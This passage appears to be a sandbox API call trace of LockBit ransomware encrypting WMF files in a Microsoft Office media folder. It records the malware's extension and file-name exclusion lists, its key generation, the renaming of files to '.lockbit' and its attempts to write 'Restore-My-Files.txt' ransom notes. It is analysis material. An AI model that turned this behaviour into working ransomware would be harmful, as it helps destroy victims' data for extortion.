ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.574] malloc (_Size=0x40068) returned 0x3df0008 [0196.574] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=12132) returned 1 [0196.575] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.575] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.575] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.576] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.576] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0196.582] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0186002.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0186002.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.582] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.582] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0196.582] free (_Block=0x1fa2ed8) [0196.582] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0186002.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.582] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.582] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.582] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb426a00, ftCreationTime.dwHighDateTime=0x1be0d22, ftLastAccessTime.dwLowDateTime=0xbd47aa20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xeb426a00, ftLastWriteTime.dwHighDateTime=0x1be0d22, nFileSizeHigh=0x0, nFileSizeLow=0x1b3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0186348.WMF", cAlternateFileName="")) returned 1 [0196.582] lstrcmpiW (lpString1=".", lpString2="J0186348.WMF") returned -1 [0196.582] lstrcmpiW (lpString1="..", lpString2="J0186348.WMF") returned -1 [0196.583] PathFindExtensionW (pszPath="J0186348.WMF") returned=".WMF" [0196.583] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.583] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.583] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.583] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.583] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.583] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.583] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.583] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.583] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.583] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.583] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.583] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.583] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.583] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.583] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.583] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.583] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.583] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.583] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.583] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.583] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.583] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.583] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.583] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.583] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.584] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.584] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.584] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.584] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.584] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.584] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.584] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.584] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.584] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.584] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.584] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.584] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.584] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.584] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.584] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.584] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.584] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.584] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.584] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.584] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.584] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.584] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.584] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0186348.WMF") returned 1 [0196.584] lstrcmpiW (lpString1="ntldr", lpString2="J0186348.WMF") returned 1 [0196.584] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0186348.WMF") returned 1 [0196.584] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0186348.WMF") returned -1 [0196.584] lstrcmpiW (lpString1="autorun.inf", lpString2="J0186348.WMF") returned -1 [0196.585] lstrcmpiW (lpString1="thumbs.db", lpString2="J0186348.WMF") returned 1 [0196.585] lstrcmpiW (lpString1="iconcache.db", lpString2="J0186348.WMF") returned -1 [0196.585] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.585] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0186348.WMF") returned=".WMF" [0196.585] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.585] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.585] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.585] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.585] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.585] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.585] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.585] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.585] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.585] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.585] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.585] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.585] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.585] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.585] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.585] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.585] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.585] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.585] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.585] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.585] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.585] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.586] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.586] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.586] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.586] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.586] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.586] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.586] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0186348.WMF.lockbit") returned 70 [0196.586] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0186348.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0186348.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0196.587] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.587] malloc (_Size=0x40068) returned 0x3df0008 [0196.587] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6970) returned 1 [0196.587] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.588] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.588] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.589] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.589] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.589] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.606] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0186348.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0186348.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.607] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.607] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0196.608] free (_Block=0x1fa2ed8) [0196.608] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0186348.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.608] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.609] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.609] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b608300, ftCreationTime.dwHighDateTime=0x1be10fe, ftLastAccessTime.dwLowDateTime=0xbd4a0b80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x1b608300, ftLastWriteTime.dwHighDateTime=0x1be10fe, nFileSizeHigh=0x0, nFileSizeLow=0x4746, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0187423.WMF", cAlternateFileName="")) returned 1 [0196.609] lstrcmpiW (lpString1=".", lpString2="J0187423.WMF") returned -1 [0196.609] lstrcmpiW (lpString1="..", lpString2="J0187423.WMF") returned -1 [0196.609] PathFindExtensionW (pszPath="J0187423.WMF") returned=".WMF" [0196.609] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.609] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.609] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.609] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.609] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.609] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.609] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.609] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.609] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.609] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.609] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.609] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.609] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.609] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.609] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.610] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.610] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.610] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.610] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.610] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.610] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.610] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.610] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.610] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.610] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.610] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.610] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.610] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.610] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.610] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.610] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.610] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.610] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.610] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.610] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.610] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.610] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.610] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.610] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.611] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.611] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.611] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.611] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.611] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.611] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.611] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.611] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.611] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0187423.WMF") returned 1 [0196.611] lstrcmpiW (lpString1="ntldr", lpString2="J0187423.WMF") returned 1 [0196.611] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0187423.WMF") returned 1 [0196.611] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0187423.WMF") returned -1 [0196.611] lstrcmpiW (lpString1="autorun.inf", lpString2="J0187423.WMF") returned -1 [0196.611] lstrcmpiW (lpString1="thumbs.db", lpString2="J0187423.WMF") returned 1 [0196.611] lstrcmpiW (lpString1="iconcache.db", lpString2="J0187423.WMF") returned -1 [0196.611] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.611] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0187423.WMF") returned=".WMF" [0196.611] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.611] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.611] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.611] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.611] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.611] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.611] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.612] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.612] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.612] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.612] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.612] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.612] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.612] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.612] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.612] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.612] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.612] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.612] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.612] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.612] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.612] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.612] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.612] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.612] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.612] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.612] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.612] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.612] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0187423.WMF.lockbit") returned 70 [0196.613] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0187423.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0187423.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0196.615] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.615] malloc (_Size=0x40068) returned 0x1ff1e60 [0196.615] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=18246) returned 1 [0196.615] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.615] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.615] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0196.616] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.616] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.616] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0196.616] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0196.620] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0187423.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0187423.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.620] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.620] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0196.622] free (_Block=0x1fa2ed8) [0196.622] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0187423.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.622] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.622] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.622] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc36d6a00, ftCreationTime.dwHighDateTime=0x1be2705, ftLastAccessTime.dwLowDateTime=0xbd4a0b80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xc36d6a00, ftLastWriteTime.dwHighDateTime=0x1be2705, nFileSizeHigh=0x0, nFileSizeLow=0x31da, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0195384.WMF", cAlternateFileName="")) returned 1 [0196.622] lstrcmpiW (lpString1=".", lpString2="J0195384.WMF") returned -1 [0196.622] lstrcmpiW (lpString1="..", lpString2="J0195384.WMF") returned -1 [0196.622] PathFindExtensionW (pszPath="J0195384.WMF") returned=".WMF" [0196.622] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.622] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.622] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.623] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.623] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.623] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.623] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.623] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.623] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.623] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.623] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.623] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.623] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.623] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.623] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.623] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.623] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.623] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.623] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.623] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.623] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.623] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.623] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.624] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.624] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.625] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.625] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.625] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.625] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.625] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.625] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.625] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.625] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.625] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.625] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.625] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.625] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.625] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.625] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.625] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.625] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.625] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.625] 